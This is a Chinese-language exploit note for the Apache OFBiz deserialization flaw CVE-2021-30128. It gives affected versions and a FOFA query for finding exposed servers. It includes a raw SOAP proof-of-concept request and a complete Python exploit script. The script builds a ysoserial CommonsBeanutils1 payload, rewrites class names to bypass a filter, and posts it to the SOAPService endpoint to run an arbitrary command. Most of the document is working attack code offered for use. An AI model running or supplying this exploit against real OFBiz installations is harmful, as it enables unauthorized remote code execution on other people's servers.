Apache OFBiz 反序列化(CVE-2021-30128).md
4.05 KB / 2021-05-21 09:14:38
# Apache OFBiz 反序列化(CVE-2021-30128)
影响版本
Apache OFBiz < 17.12.07
FOFA:
`app="Apache_OFBiz"`
阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
PoC:
```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key> <cus-obj>ACED0005 ... ... 871007E000D78</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
```
EXP.py:
```py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/3/24-15:09
"""
import subprocess
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-30128 Powered by r0cky
===================================================
""")
def bypass(payload):
className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl']
for cn in className:
len_hex = hex(len(cn)).replace('0x','').upper()
className_hex = cn.encode().hex().upper()
bypass_className = cn + '<java' + cn[cn.rfind('.'):]
bypass_len_hex = hex(len(bypass_className)).replace('0x','').upper()
bypass_className_hex = bypass_className.encode().hex().upper()
payload = payload.replace(len_hex + className_hex, bypass_len_hex + bypass_className_hex)
return payload
def exp(url, cmd):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "CommonsBeanutils1", cmd], stdout=subprocess.PIPE)
payload = popen.stdout.read()
if len(payload) == 0:
print("请在当前脚本目录放置ysoserial.jar!")
exit(-1)
payload = payload.hex().upper()
post_data = bypass(payload)
print("[+] Payload:", post_data)
data = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{}</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
""".format(post_data)
print("[+] payload sending...")
r = requests.post(url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] send payload success.")
print()
print("[END] Apache OFBiz RCE Done.")
else:
print("[-] send payload failed.")
print()
print("[END] Apache OFBiz RCE failed.")
headers={"Content-Type": "text/xml"}
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
# target = "https://192.168.80.136:8443"
# vps_ip = "10.20.28.16"
# vps_port = "9999"
url = "{}/webtools/control/SOAPService".format(target)
exp(url, cmd)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
```
ref:
* https://github.com/r0ckysec/CVE-2021-30128
* https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A